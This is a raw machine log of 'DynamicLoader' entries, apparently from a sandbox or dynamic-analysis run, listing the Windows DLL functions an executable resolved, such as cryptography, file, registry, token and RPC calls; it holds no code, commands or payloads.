DynamicLoader: ADVAPI32.dll/EventSetInformation
DynamicLoader: COMCTL32.dll/InitCommonControlsEx
DynamicLoader: COMCTL32.dll/InitCommonControlsEx
DynamicLoader: COMCTL32.dll/InitCommonControlsEx
DynamicLoader: COMCTL32.dll/InitCommonControlsEx
DynamicLoader: COMCTL32.dll/InitCommonControlsEx
DynamicLoader: COMCTL32.dll/InitCommonControlsEx
DynamicLoader: dwmapi.dll/DwmIsCompositionEnabled
DynamicLoader: COMCTL32.dll/RegisterClassNameW
DynamicLoader: uxtheme.dll/EnableThemeDialogTexture
DynamicLoader: uxtheme.dll/OpenThemeData
DynamicLoader: uxtheme.dll/GetThemeBool
DynamicLoader: COMCTL32.dll/HIMAGELIST_QueryInterface
DynamicLoader: COMCTL32.dll/DrawShadowText
DynamicLoader: COMCTL32.dll/DrawSizeBox
DynamicLoader: COMCTL32.dll/DrawScrollBar
DynamicLoader: COMCTL32.dll/SizeBoxHwnd
DynamicLoader: COMCTL32.dll/ScrollBar_MouseMove
DynamicLoader: COMCTL32.dll/ScrollBar_Menu
DynamicLoader: COMCTL32.dll/HandleScrollCmd
DynamicLoader: COMCTL32.dll/DetachScrollBars
DynamicLoader: COMCTL32.dll/AttachScrollBars
DynamicLoader: COMCTL32.dll/CCSetScrollInfo
DynamicLoader: COMCTL32.dll/CCGetScrollInfo
DynamicLoader: COMCTL32.dll/CCEnableScrollBar
DynamicLoader: COMCTL32.dll/QuerySystemGestureStatus
DynamicLoader: uxtheme.dll/
DynamicLoader: uxtheme.dll/CloseThemeData
DynamicLoader: COMCTL32.dll/RegisterClassNameW
DynamicLoader: uxtheme.dll/IsThemePartDefined
DynamicLoader: uxtheme.dll/GetThemeFont
DynamicLoader: uxtheme.dll/GetThemeColor
DynamicLoader: IMM32.DLL/ImmGetContext
DynamicLoader: IMM32.DLL/ImmReleaseContext
DynamicLoader: IMM32.DLL/ImmAssociateContext
DynamicLoader: IMM32.DLL/ImmIsIME
DynamicLoader: COMCTL32.dll/RegisterClassNameW
DynamicLoader: uxtheme.dll/GetThemeInt
DynamicLoader: COMCTL32.dll/RegisterClassNameW
DynamicLoader: uxtheme.dll/GetThemeMargins
DynamicLoader: COMCTL32.dll/RegisterClassNameW
DynamicLoader: uxtheme.dll/SetWindowTheme
DynamicLoader: uxtheme.dll/DrawThemeBackground
DynamicLoader: GDI32.dll/GetLayout
DynamicLoader: GDI32.dll/GdiRealizationInfo
DynamicLoader: GDI32.dll/FontIsLinked
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryInfoKeyW
DynamicLoader: GDI32.dll/GetTextFaceAliasW
DynamicLoader: ADVAPI32.dll/RegEnumValueW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: GDI32.dll/GetFontAssocStatus
DynamicLoader: ADVAPI32.dll/RegQueryValueExA
DynamicLoader: ADVAPI32.dll/RegEnumKeyExW
DynamicLoader: GDI32.dll/GetTextFaceAliasW
DynamicLoader: GDI32.dll/GdiIsMetaPrintDC
DynamicLoader: ADVAPI32.dll/CryptAcquireContextA
DynamicLoader: ADVAPI32.dll/CryptImportKey
DynamicLoader: ADVAPI32.dll/CryptDestroyKey
DynamicLoader: ADVAPI32.dll/CryptEncrypt
DynamicLoader: ADVAPI32.dll/CryptDecrypt
DynamicLoader: ADVAPI32.dll/CryptGenKey
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/WriteFile
DynamicLoader: kernel32.dll/ReadFile
DynamicLoader: kernel32.dll/MoveFileW
DynamicLoader: kernel32.dll/MoveFileExW
DynamicLoader: kernel32.dll/DeleteFileW
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: USP10.dll/ScriptGetProperties
DynamicLoader: USP10.dll/ScriptItemize
DynamicLoader: msls31.dll/
DynamicLoader: msls31.dll/
DynamicLoader: msls31.dll/
DynamicLoader: msls31.dll/
DynamicLoader: msls31.dll/
DynamicLoader: msls31.dll/
DynamicLoader: msls31.dll/
DynamicLoader: msls31.dll/
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: CRYPTBASE.dll/SystemFunction036
DynamicLoader: ole32.dll/CoRegisterInitializeSpy
DynamicLoader: ole32.dll/CoRevokeInitializeSpy
DynamicLoader: uxtheme.dll/BufferedPaintInit
DynamicLoader: uxtheme.dll/BufferedPaintRenderAnimation
DynamicLoader: uxtheme.dll/GetThemeTransitionDuration
DynamicLoader: uxtheme.dll/BeginBufferedAnimation
DynamicLoader: uxtheme.dll/IsThemeBackgroundPartiallyTransparent
DynamicLoader: uxtheme.dll/DrawThemeParentBackground
DynamicLoader: uxtheme.dll/GetThemeBackgroundContentRect
DynamicLoader: uxtheme.dll/DrawThemeText
DynamicLoader: uxtheme.dll/EndBufferedAnimation
DynamicLoader: msls31.dll/
DynamicLoader: uxtheme.dll/GetThemePartSize
DynamicLoader: msls31.dll/
DynamicLoader: uxtheme.dll/DrawThemeParentBackgroundEx
DynamicLoader: uxtheme.dll/BeginBufferedPaint
DynamicLoader: uxtheme.dll/EndBufferedPaint
DynamicLoader: GDI32.dll/GetTextExtentExPointWPri
DynamicLoader: uxtheme.dll/GetThemeTextExtent
DynamicLoader: msls31.dll/
DynamicLoader: msls31.dll/
DynamicLoader: kernel32.dll/SetThreadUILanguage
DynamicLoader: kernel32.dll/CopyFileExW
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: kernel32.dll/SetConsoleInputExeNameW
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: CRYPTBASE.dll/SystemFunction036
DynamicLoader: ole32.dll/CLSIDFromOle1Class
DynamicLoader: CLBCatQ.DLL/GetCatalogObject
DynamicLoader: CLBCatQ.DLL/GetCatalogObject2
DynamicLoader: sechost.dll/LookupAccountNameLocalW
DynamicLoader: ADVAPI32.dll/LookupAccountSidW
DynamicLoader: sechost.dll/LookupAccountSidLocalW
DynamicLoader: uxtheme.dll/ThemeInitApiHook
DynamicLoader: USER32.dll/IsProcessDPIAware
DynamicLoader: ole32.dll/CoGetClassObject
DynamicLoader: ole32.dll/CoGetMarshalSizeMax
DynamicLoader: ole32.dll/CoMarshalInterface
DynamicLoader: ole32.dll/CoUnmarshalInterface
DynamicLoader: ole32.dll/StringFromIID
DynamicLoader: ole32.dll/CoGetPSClsid
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: ole32.dll/CoReleaseMarshalData
DynamicLoader: ole32.dll/DcomChannelSetHResult
DynamicLoader: thumbcache.dll/DllGetClassObject
DynamicLoader: thumbcache.dll/DllCanUnloadNow
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: ole32.dll/CoGetMarshalSizeMax
DynamicLoader: ole32.dll/CoMarshalInterface
DynamicLoader: ole32.dll/CoUnmarshalInterface
DynamicLoader: ole32.dll/CoReleaseMarshalData
DynamicLoader: PROPSYS.dll/DllGetClassObject
DynamicLoader: PROPSYS.dll/DllCanUnloadNow
DynamicLoader: actxprxy.dll/DllGetClassObject
DynamicLoader: actxprxy.dll/DllCanUnloadNow
DynamicLoader: OLEAUT32.dll/
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: kernel32.dll/SetThreadUILanguage
DynamicLoader: kernel32.dll/CopyFileExW
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: kernel32.dll/SetConsoleInputExeNameW
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: CRYPTBASE.dll/SystemFunction036
DynamicLoader: sechost.dll/LookupAccountNameLocalW
DynamicLoader: ADVAPI32.dll/LookupAccountSidW
DynamicLoader: sechost.dll/LookupAccountSidLocalW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: CRYPTSP.dll/CryptReleaseContext
DynamicLoader: ADVAPI32.dll/StartServiceW
DynamicLoader: WS2_32.dll/
DynamicLoader: WINHTTP.dll/WinHttpCloseHandle
DynamicLoader: USER32.dll/UnhookWindowsHookEx
DynamicLoader: USER32.dll/UnregisterPowerSettingNotification
DynamicLoader: POWRPROF.DLL/PowerSettingUnregisterNotification
DynamicLoader: POWRPROF.DLL/PowerSettingUnregisterNotification
DynamicLoader: POWRPROF.DLL/PowerSettingUnregisterNotification
DynamicLoader: POWRPROF.DLL/PowerSettingUnregisterNotification
DynamicLoader: POWRPROF.DLL/PowerSettingUnregisterNotification
DynamicLoader: POWRPROF.DLL/PowerSettingUnregisterNotification
DynamicLoader: USER32.dll/DestroyWindow
DynamicLoader: USER32.dll/UnregisterClassW
DynamicLoader: USER32.dll/IsProcessDPIAware
DynamicLoader: USER32.dll/GetThreadDpiAwarenessContext
DynamicLoader: WINSTA.dll/WinStationUnRegisterConsoleNotification
DynamicLoader: RPCRT4.dll/RpcAsyncGetCallStatus
DynamicLoader: RPCRT4.dll/RpcAsyncCancelCall
DynamicLoader: RPCRT4.dll/RpcAsyncCompleteCall
DynamicLoader: RPCRT4.dll/RpcBindingFree
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/UnregisterTraceGuids
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: CRYPTSP.dll/CryptReleaseContext
DynamicLoader: kernel32.dll/RegQueryValueExW
DynamicLoader: CRYPTBASE.dll/SystemFunction036
DynamicLoader: sechost.dll/LookupAccountNameLocalW
DynamicLoader: sechost.dll/LookupAccountNameLocalW
DynamicLoader: ADVAPI32.dll/LookupAccountSidW
DynamicLoader: sechost.dll/LookupAccountSidLocalW
DynamicLoader: CRYPTSP.dll/CryptAcquireContextW
DynamicLoader: CRYPTSP.dll/CryptGenRandom
DynamicLoader: RpcRtRemote.dll/I_RpcExtInitializeExtensionPoint
DynamicLoader: ole32.dll/CoRegisterClassObject
DynamicLoader: ole32.dll/CoGetClassObject
DynamicLoader: ole32.dll/CoGetMarshalSizeMax
DynamicLoader: ole32.dll/CoMarshalInterface
DynamicLoader: ole32.dll/CoUnmarshalInterface
DynamicLoader: ole32.dll/StringFromIID
DynamicLoader: ole32.dll/CoGetPSClsid
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: ole32.dll/CoReleaseMarshalData
DynamicLoader: ole32.dll/DcomChannelSetHResult
DynamicLoader: vss_ps.dll/DllGetClassObject
DynamicLoader: vss_ps.dll/DllCanUnloadNow
DynamicLoader: ole32.dll/CoGetMarshalSizeMax
DynamicLoader: ole32.dll/CoMarshalInterface
DynamicLoader: ole32.dll/CoUnmarshalInterface
DynamicLoader: ole32.dll/CoReleaseMarshalData
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ADVAPI32.dll/LookupAccountNameW
DynamicLoader: ADVAPI32.dll/LookupAccountSidW
DynamicLoader: SAMCLI.DLL/NetLocalGroupGetMembers
DynamicLoader: SAMLIB.dll/SamConnect
DynamicLoader: RPCRT4.dll/NdrClientCall3
DynamicLoader: RPCRT4.dll/RpcStringBindingComposeW
DynamicLoader: RPCRT4.dll/RpcBindingFromStringBindingW
DynamicLoader: RPCRT4.dll/RpcStringFreeW
DynamicLoader: RPCRT4.dll/RpcBindingFree
DynamicLoader: SAMLIB.dll/SamOpenDomain
DynamicLoader: SAMLIB.dll/SamLookupNamesInDomain
DynamicLoader: SAMLIB.dll/SamOpenAlias
DynamicLoader: SAMLIB.dll/SamFreeMemory
DynamicLoader: SAMLIB.dll/SamCloseHandle
DynamicLoader: SAMLIB.dll/SamGetMembersInAlias
DynamicLoader: netutils.dll/NetApiBufferFree
DynamicLoader: ole32.dll/CoCreateGuid
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: ole32.dll/StringFromCLSID
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: PROPSYS.dll/VariantToPropVariant
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: catsrvut.dll/CreateComRegDBWriter
DynamicLoader: VSSAPI.DLL/CreateWriter
DynamicLoader: PROPSYS.dll/PropVariantToVariant
DynamicLoader: ole32.dll/CoDisconnectObject
DynamicLoader: ole32.dll/CoDisconnectContext
DynamicLoader: catsrvut.dll/DestroyComRegDBWriter
DynamicLoader: ole32.dll/CoRevokeClassObject
DynamicLoader: ADVAPI32.dll/UnregisterTraceGuids
DynamicLoader: CRYPTSP.dll/CryptReleaseContext
DynamicLoader: CRYPTBASE.dll/SystemFunction036
DynamicLoader: sechost.dll/LookupAccountNameLocalW
DynamicLoader: ADVAPI32.dll/LookupAccountSidW
DynamicLoader: sechost.dll/LookupAccountSidLocalW
DynamicLoader: kernel32.dll/SetThreadUILanguage
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: kernel32.dll/GetModuleHandleW
DynamicLoader: urlmon.dll/DllCanUnloadNow
DynamicLoader: urlmon.dll/IEDllLoader
DynamicLoader: urlmon.dll/CoInternetCreateZoneManager
DynamicLoader: urlmon.dll/CoInternetGetSession
DynamicLoader: urlmon.dll/CopyBindInfo
DynamicLoader: urlmon.dll/CreateURLMoniker
DynamicLoader: urlmon.dll/RegisterBindStatusCallback
DynamicLoader: urlmon.dll/ReleaseBindInfo
DynamicLoader: urlmon.dll/RevokeBindStatusCallback
DynamicLoader: urlmon.dll/UrlMkGetSessionOption
DynamicLoader: urlmon.dll/CoInternetCreateSecurityManager
DynamicLoader: urlmon.dll/CreateUri
DynamicLoader: urlmon.dll/CoInternetCombineUrl
DynamicLoader: urlmon.dll/CoInternetGetSecurityUrl
DynamicLoader: urlmon.dll/IsValidURL
DynamicLoader: WININET.dll/InternetCrackUrlW
DynamicLoader: WININET.dll/InternetCreateUrlW
DynamicLoader: api-ms-win-downlevel-shlwapi-l1-1-0.dll/PathCreateFromUrlW
DynamicLoader: uxtheme.dll/ThemeInitApiHook
DynamicLoader: USER32.dll/IsProcessDPIAware
DynamicLoader: api-ms-win-downlevel-shlwapi-l2-1-0.dll/IUnknown_QueryService
DynamicLoader: kernel32.dll/GetThreadPreferredUILanguages
DynamicLoader: kernel32.dll/SetThreadPreferredUILanguages
DynamicLoader: kernel32.dll/LocaleNameToLCID
DynamicLoader: kernel32.dll/GetLocaleInfoEx
DynamicLoader: kernel32.dll/LCIDToLocaleName
DynamicLoader: kernel32.dll/GetSystemDefaultLocaleName
DynamicLoader: kernel32.dll/RegOpenKeyExW
DynamicLoader: kernel32.dll/ResolveDelayLoadedAPI
DynamicLoader: USER32.dll/LoadStringW
DynamicLoader: ntdll.dll/EtwUnregisterTraceGuids
DynamicLoader: ntdll.dll/EtwUnregisterTraceGuids
DynamicLoader: OLEAUT32.dll/
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/UnregisterTraceGuids
DynamicLoader: CRYPTSP.dll/CryptReleaseContext
DynamicLoader: wbemcore.dll/Reinitialize
DynamicLoader: wbemsvc.dll/DllGetClassObject
DynamicLoader: wbemsvc.dll/DllCanUnloadNow
DynamicLoader: sechost.dll/LookupAccountSidLocalW
DynamicLoader: KERNELBASE.dll/AllocateAndInitializeSid
DynamicLoader: wbemcore.dll/Reinitialize
DynamicLoader: ADVAPI32.dll/RegOpenKeyW
DynamicLoader: wbemcore.dll/Reinitialize
DynamicLoader: SspiCli.dll/LogonUserExExW
DynamicLoader: wbemcore.dll/Reinitialize
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: Wtsapi32.dll/WTSEnumerateSessionsA
DynamicLoader: Wtsapi32.dll/WTSFreeMemory
DynamicLoader: WINSTA.dll/WinStationEnumerateW
DynamicLoader: ADVAPI32.dll/LookupAccountSidW
DynamicLoader: sechost.dll/LookupAccountSidLocalW
DynamicLoader: ADVAPI32.dll/CreateWellKnownSid
DynamicLoader: RPCRT4.dll/RpcStringBindingComposeW
DynamicLoader: RPCRT4.dll/RpcBindingFromStringBindingW
DynamicLoader: RPCRT4.dll/RpcStringFreeW
DynamicLoader: RPCRT4.dll/RpcBindingSetAuthInfoExW
DynamicLoader: sechost.dll/LookupAccountNameLocalW
DynamicLoader: RPCRT4.dll/NdrClientCall2
DynamicLoader: RPCRT4.dll/I_RpcExceptionFilter
DynamicLoader: RPCRT4.dll/RpcBindingFree
DynamicLoader: WINSTA.dll/WinStationFreeMemory
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/LookupPrivilegeValueA
DynamicLoader: ADVAPI32.dll/AdjustTokenPrivileges
DynamicLoader: ADVAPI32.dll/DuplicateTokenEx
DynamicLoader: ADVAPI32.dll/CreateProcessAsUserA
DynamicLoader: kernel32.dll/WTSGetActiveConsoleSessionId
DynamicLoader: kernel32.dll/GetCurrentProcess
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: userenv.dll/CreateEnvironmentBlock
DynamicLoader: userenv.dll/DestroyEnvironmentBlock
DynamicLoader: Wtsapi32.dll/WTSQueryUserToken
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/LookupPrivilegeValueA
DynamicLoader: ADVAPI32.dll/AdjustTokenPrivileges
DynamicLoader: ADVAPI32.dll/DuplicateTokenEx
DynamicLoader: ADVAPI32.dll/CreateProcessAsUserA
DynamicLoader: kernel32.dll/WTSGetActiveConsoleSessionId
DynamicLoader: kernel32.dll/GetCurrentProcess
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: userenv.dll/CreateEnvironmentBlock
DynamicLoader: userenv.dll/DestroyEnvironmentBlock
DynamicLoader: Wtsapi32.dll/WTSQueryUserToken
DynamicLoader: kernel32.dll/TryEnterCriticalSection
DynamicLoader: kernel32.dll/SetCriticalSectionSpinCount
DynamicLoader: LPK.dll/LpkEditControl
DynamicLoader: kernel32.dll/AcquireSRWLockExclusive
DynamicLoader: kernel32.dll/ReleaseSRWLockExclusive
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegisterTraceGuidsW
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/OpenThreadToken
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/OpenProcessToken
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/AllocateAndInitializeSid
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/CheckTokenMembership
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/FreeSid
DynamicLoader: kernel32.dll/AcquireSRWLockExclusive
DynamicLoader: kernel32.dll/ReleaseSRWLockExclusive
DynamicLoader: ADVAPI32.dll/RegisterTraceGuidsA
DynamicLoader: ADVAPI32.dll/EventSetInformation
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/UnregisterTraceGuids
DynamicLoader: kernel32.dll/RegQueryValueExW
DynamicLoader: api-ms-win-core-synch-l1-2-0.dll/InitializeCriticalSectionEx
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: api-ms-win-core-synch-l1-2-0.dll/InitializeCriticalSectionEx
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/LCMapStringEx
DynamicLoader: api-ms-win-core-synch-l1-2-0.dll/InitializeCriticalSectionEx
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/InitializeCriticalSectionEx
DynamicLoader: kernel32.dll/InitOnceExecuteOnce
DynamicLoader: kernel32.dll/CreateEventExW
DynamicLoader: kernel32.dll/CreateSemaphoreW
DynamicLoader: kernel32.dll/CreateSemaphoreExW
DynamicLoader: kernel32.dll/CreateThreadpoolTimer
DynamicLoader: kernel32.dll/SetThreadpoolTimer
DynamicLoader: kernel32.dll/WaitForThreadpoolTimerCallbacks
DynamicLoader: kernel32.dll/CloseThreadpoolTimer
DynamicLoader: kernel32.dll/CreateThreadpoolWait
DynamicLoader: kernel32.dll/SetThreadpoolWait
DynamicLoader: kernel32.dll/CloseThreadpoolWait
DynamicLoader: kernel32.dll/FlushProcessWriteBuffers
DynamicLoader: kernel32.dll/FreeLibraryWhenCallbackReturns
DynamicLoader: kernel32.dll/GetCurrentProcessorNumber
DynamicLoader: kernel32.dll/CreateSymbolicLinkW
DynamicLoader: kernel32.dll/GetCurrentPackageId
DynamicLoader: kernel32.dll/GetTickCount64
DynamicLoader: kernel32.dll/GetFileInformationByHandleEx
DynamicLoader: kernel32.dll/SetFileInformationByHandle
DynamicLoader: kernel32.dll/GetSystemTimePreciseAsFileTime
DynamicLoader: kernel32.dll/InitializeConditionVariable
DynamicLoader: kernel32.dll/WakeConditionVariable
DynamicLoader: kernel32.dll/WakeAllConditionVariable
DynamicLoader: kernel32.dll/SleepConditionVariableCS
DynamicLoader: kernel32.dll/InitializeSRWLock
DynamicLoader: kernel32.dll/AcquireSRWLockExclusive
DynamicLoader: kernel32.dll/TryAcquireSRWLockExclusive
DynamicLoader: kernel32.dll/ReleaseSRWLockExclusive
DynamicLoader: kernel32.dll/SleepConditionVariableSRW
DynamicLoader: kernel32.dll/CreateThreadpoolWork
DynamicLoader: kernel32.dll/SubmitThreadpoolWork
DynamicLoader: kernel32.dll/CloseThreadpoolWork
DynamicLoader: kernel32.dll/CompareStringEx
DynamicLoader: kernel32.dll/GetLocaleInfoEx
DynamicLoader: kernel32.dll/LCMapStringEx
DynamicLoader: api-ms-win-core-synch-l1-2-0.dll/InitializeCriticalSectionEx
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: api-ms-win-core-synch-l1-2-0.dll/InitializeCriticalSectionEx
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/LCMapStringEx
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/InitializeCriticalSectionEx
DynamicLoader: kernel32.dll/InitOnceExecuteOnce
DynamicLoader: kernel32.dll/CreateEventExW
DynamicLoader: kernel32.dll/CreateSemaphoreW
DynamicLoader: kernel32.dll/CreateSemaphoreExW
DynamicLoader: kernel32.dll/CreateThreadpoolTimer
DynamicLoader: kernel32.dll/SetThreadpoolTimer
DynamicLoader: kernel32.dll/WaitForThreadpoolTimerCallbacks
DynamicLoader: kernel32.dll/CloseThreadpoolTimer
DynamicLoader: kernel32.dll/CreateThreadpoolWait
DynamicLoader: kernel32.dll/SetThreadpoolWait
DynamicLoader: kernel32.dll/CloseThreadpoolWait
DynamicLoader: kernel32.dll/FlushProcessWriteBuffers
DynamicLoader: kernel32.dll/FreeLibraryWhenCallbackReturns
DynamicLoader: kernel32.dll/GetCurrentProcessorNumber
DynamicLoader: kernel32.dll/CreateSymbolicLinkW
DynamicLoader: kernel32.dll/GetCurrentPackageId
DynamicLoader: kernel32.dll/GetTickCount64
DynamicLoader: kernel32.dll/GetFileInformationByHandleEx
DynamicLoader: kernel32.dll/SetFileInformationByHandle
DynamicLoader: kernel32.dll/GetSystemTimePreciseAsFileTime
DynamicLoader: kernel32.dll/InitializeConditionVariable
DynamicLoader: kernel32.dll/WakeConditionVariable
DynamicLoader: kernel32.dll/WakeAllConditionVariable
DynamicLoader: kernel32.dll/SleepConditionVariableCS
DynamicLoader: kernel32.dll/InitializeSRWLock
DynamicLoader: kernel32.dll/AcquireSRWLockExclusive
DynamicLoader: kernel32.dll/TryAcquireSRWLockExclusive
DynamicLoader: kernel32.dll/ReleaseSRWLockExclusive
DynamicLoader: kernel32.dll/SleepConditionVariableSRW
DynamicLoader: kernel32.dll/CreateThreadpoolWork
DynamicLoader: kernel32.dll/SubmitThreadpoolWork
DynamicLoader: kernel32.dll/CloseThreadpoolWork
DynamicLoader: kernel32.dll/CompareStringEx
DynamicLoader: kernel32.dll/GetLocaleInfoEx
DynamicLoader: kernel32.dll/LCMapStringEx
DynamicLoader: api-ms-win-core-synch-l1-2-0.dll/InitializeConditionVariable
DynamicLoader: api-ms-win-core-synch-l1-2-0.dll/SleepConditionVariableCS
DynamicLoader: api-ms-win-core-synch-l1-2-0.dll/WakeAllConditionVariable
DynamicLoader: kernel32.dll/CreateHardLinkW
DynamicLoader: kernel32.dll/CreateSymbolicLinkW
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: api-ms-win-core-synch-l1-2-0.dll/InitializeConditionVariable
DynamicLoader: api-ms-win-core-synch-l1-2-0.dll/SleepConditionVariableCS
DynamicLoader: api-ms-win-core-synch-l1-2-0.dll/WakeAllConditionVariable
DynamicLoader: kernel32.dll/CreateHardLinkW
DynamicLoader: kernel32.dll/CreateSymbolicLinkW
DynamicLoader: ADVAPI32.dll/EventSetInformation
DynamicLoader: CRYPTBASE.dll/SystemFunction036
DynamicLoader: ADVAPI32.dll/EventSetInformation
DynamicLoader: ADVAPI32.dll/EventSetInformation
DynamicLoader: kernel32.dll/GetCurrentPackageId
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: kernel32.dll/AcquireSRWLockExclusive
DynamicLoader: kernel32.dll/ReleaseSRWLockExclusive
DynamicLoader: msi.dll/
DynamicLoader: msi.dll/
DynamicLoader: ADVAPI32.dll/CheckTokenMembership
DynamicLoader: msi.dll/
DynamicLoader: USER32.dll/GetKeyboardLayoutList
DynamicLoader: ADVAPI32.dll/EventSetInformation
DynamicLoader: VERSION.dll/GetFileVersionInfoSizeW
DynamicLoader: VERSION.dll/GetFileVersionInfoW
DynamicLoader: VERSION.dll/VerQueryValueW
DynamicLoader: SHELL32.dll/SHGetFolderPathW
DynamicLoader: Secur32.dll/GetUserNameExW
DynamicLoader: SHELL32.dll/CommandLineToArgvW
DynamicLoader: USER32.dll/RegisterClassExW
DynamicLoader: IMM32.DLL/ImmDisableIME
DynamicLoader: USER32.dll/CreateWindowExW
DynamicLoader: uxtheme.dll/ThemeInitApiHook
DynamicLoader: RPCRT4.dll/RpcServerRegisterIf3
DynamicLoader: RpcRtRemote.dll/I_RpcExtInitializeExtensionPoint
DynamicLoader: USER32.dll/DefWindowProcW
DynamicLoader: dwmapi.dll/DwmIsCompositionEnabled
DynamicLoader: USER32.dll/RegisterRawInputDevices
DynamicLoader: USER32.dll/SetTimer
DynamicLoader: USER32.dll/SetWindowLongPtrW
DynamicLoader: USER32.dll/SetWindowsHookExW
DynamicLoader: USER32.dll/MsgWaitForMultipleObjects
DynamicLoader: Secur32.dll/InitSecurityInterfaceW
DynamicLoader: cryptsp.dll/SystemFunction035
DynamicLoader: Normaliz.dll/IdnToAscii
DynamicLoader: urlmon.dll/CoInternetCreateSecurityManager
DynamicLoader: Secur32.dll/GetUserNameExW
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/GetTokenInformation
DynamicLoader: Secur32.dll/GetUserNameExA
DynamicLoader: api-ms-win-downlevel-advapi32-l2-1-0.dll/ConvertSidToStringSidW
DynamicLoader: api-ms-win-downlevel-advapi32-l2-1-0.dll/ConvertStringSecurityDescriptorToSecurityDescriptorW
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoTaskMemFree
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/EventRegister
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegGetValueA
DynamicLoader: iertutil.dll/
DynamicLoader: iertutil.dll/
DynamicLoader: iertutil.dll/
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegOpenKeyExA
DynamicLoader: api-ms-win-downlevel-ole32-l1-1-0.dll/CoTaskMemAlloc
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: winhttp.dll/WinHttpCreateProxyResolver
DynamicLoader: iertutil.dll/
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegQueryValueExW
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/EventActivityIdControl
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegCreateKeyExW
DynamicLoader: IPHLPAPI.DLL/GetBestInterfaceEx
DynamicLoader: IPHLPAPI.DLL/GetIfEntry2
DynamicLoader: api-ms-win-downlevel-shlwapi-l2-1-0.dll/SHGetValueA
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegSetValueExW
DynamicLoader: api-ms-win-downlevel-advapi32-l1-1-0.dll/RegDeleteValueW
DynamicLoader: kernel32.dll/AcquireSRWLockExclusive
DynamicLoader: kernel32.dll/ReleaseSRWLockExclusive
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
